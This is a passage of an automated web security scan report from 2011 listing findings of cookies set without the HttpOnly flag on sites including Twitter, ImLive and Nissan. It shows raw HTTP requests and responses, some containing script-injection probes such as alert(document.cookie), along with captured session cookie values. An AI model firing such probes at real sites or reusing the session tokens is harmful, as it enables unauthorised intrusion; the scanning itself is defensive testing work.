User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI"
Content-Type: text/html
Expires: Fri, 28 Jan 2011 05:20:30 GMT
Set-Cookie: cid=4473401; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSQCBSCQ=ILBLDIICKPOMNHFEBBFBBIPG; path=/
Cache-control: private
Content-Length: 74164


<HTML>
<HEAD>
<TITLE>Quick Search</TITLE>
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script language="JavaScript">
<!--

   function saveFavorites() {
       if (document.results) {
           document.resu
...[SNIP]...

11.9. http://event.adxpose.com/event.flow

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F'%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert(0x00241B)%253C%2Fscript%253E&uid=7hSy8PbjRnOXSf2i_40364845&xy=104%2C60&wh=1155%2C1012&vchannel=bzo.847.CD39C435!&cid=5196052&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=0 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F7984D788D573EFCDF0206C9A4486038; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Fri, 28 Jan 2011 15:00:16 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("7hSy8PbjRnOXSf2i_40364845");

11.10. http://imlive.com/homepagems3.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://imlive.com
Path:   /homepagems3.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below). One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepagems3.asp HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 13:59:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 13:59:08 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10201


<html>
   <head>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...

11.11. http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

Summary

Severity:   Low
Confidence:   Firm
Host:   http://imlive.com
Path:   /homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://burp/show/1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.2.10.1296223202; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:05:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:05:46 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 8407


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...

11.12. http://local.nissanusa.com/zip.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.nissanusa.com
Path:   /zip.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zip.aspx HTTP/1.1
Host: local.nissanusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=UTF-8
Expires: Fri, 28 Jan 2011 16:59:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 28 Jan 2011 16:59:34 GMT
Content-Length: 15938
Connection: close
Set-Cookie: PHPSESSID=a3osnfcnbh4c5bqf8iouogi697; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

11.13. http://support.moxiesoft.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://support.moxiesoft.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: support.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 25701
Content-Type: text/html
Expires: Fri, 28 Jan 2011 14:10:59 GMT
Set-Cookie: ASPSESSIONIDQCSSSRRR=PBGDKLDBKDBENNBAFHOIFDGM; path=/
Cache-control: private


<!--
Function getOwnerIDforUser(sEmailId)
   Dim objUser
   Dim sSql
   Dim objADOConnection
   Dim sconnString
   Dim objOwnerId
       
   Set objADOConnection = Server.CreateObject("ADODB.Connection")

...[SNIP]...

11.14. http://twitter.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224736-35616-58920
ETag: "ce84c6d523ac490f74725d4e72e7cdcf"
Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT
X-Runtime: 0.01412
Content-Type: text/html; charset=utf-8
Content-Length: 44218
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...

11.15. http://twitter.com/247realmedia

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /247realmedia

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /247realmedia HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:16:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224184-14398-11076
ETag: "7215ee9c7d9dc229d2921a40e899ec5f"
Last-Modified: Fri, 28 Jan 2011 14:16:24 GMT
X-Runtime: 0.01356
Content-Type: text/html; charset=utf-8
Content-Length: 1
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296224184721837; path=/; expires=Fri, 04-Feb-11 14:16:24 GMT; domain=.twitter.com
Set-Cookie: guest_id=12962241848871382; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTdiYTgzYzg5NjU0NmY1NzY5NjRmYzhiZDczOGFiZTQzIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIOWr7zC0B--30505dd0f6c83aaf558b61083089f58bf8eaf3f1; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close


11.16. http://twitter.com/AddThis

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /AddThis

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AddThis HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-57668-31881
ETag: "a2ed93258e38abb440f9997e5bc5343f"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.00798
Content-Type: text/html; charset=utf-8
Content-Length: 49756
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a144f2d48721ec13cc6db17b0167bf7e0dce4447; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.17. http://twitter.com/Applebees

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Applebees

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Applebees HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-32426-51080
ETag: "6de1ef610ac1e89e0f9514036de3e619"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01745
Content-Type: text/html; charset=utf-8
Content-Length: 51962
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.18. http://twitter.com/AshieApple

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /AshieApple

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AshieApple HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:52 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265972-35369-4983
ETag: "d630e94c0555a4dba001b1cdb5e86f78"
Last-Modified: Sat, 29 Jan 2011 01:52:52 GMT
X-Runtime: 0.01071
Content-Type: text/html; charset=utf-8
Content-Length: 29081
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.19. http://twitter.com/Beckett_News

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /Beckett_News

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Beckett_News HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265977-87220-8975
ETag: "04df87e3f545648158c89bbf858582e1"
Last-Modified: Sat, 29 Jan 2011 01:52:57 GMT
X-Runtime: 0.01098
Content-Type: text/html; charset=utf-8
Content-Length: 40483
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.20. http://twitter.com/BosHerald_Edge/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /BosHerald_Edge/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BosHerald_Edge/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
